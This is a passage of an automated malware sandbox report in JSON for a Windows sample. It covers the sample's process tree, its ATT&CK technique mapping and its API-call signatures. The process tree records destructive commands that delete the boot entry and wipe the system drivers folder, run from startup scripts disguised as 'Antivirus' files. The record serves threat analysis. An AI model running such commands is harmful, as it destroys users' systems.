"%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 3776 -s 108", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}, {"uid": "00000000-00001988", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00005672", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005764", "parentuid": "00000000-00005672", "name": "bcdedit.exe", "normalized_path": "%WINDIR%\\system32\\bcdedit.exe", "command_line": "bcdedit /delete {current}", "sha256": "e5bc427ba84627fa84861c54044df8ac3c3b3c3ed3d007265c6b18f588d0ca8a"}, {"uid": "00000000-00005948", "parentuid": "00000000-00005672", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "cmd /c rd %WINDIR%\\system32\\drivers/s/q", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 2, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Visual Basic", "attck_id": "T1059.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Bootkit", "attck_id": "T1542.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542/003", "malicious_identifiers_count": 1, "parent": {"technique": "Pre-OS Boot", "attck_id": "T1542", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542"}}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Rootkit", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Bootkit", "attck_id": "T1542.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542/003", "malicious_identifiers_count": 1, "parent": {"technique": "Pre-OS Boot", "attck_id": "T1542", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Dead Drop Resolver", "attck_id": "T1102.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Manipulation", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565", "malicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter 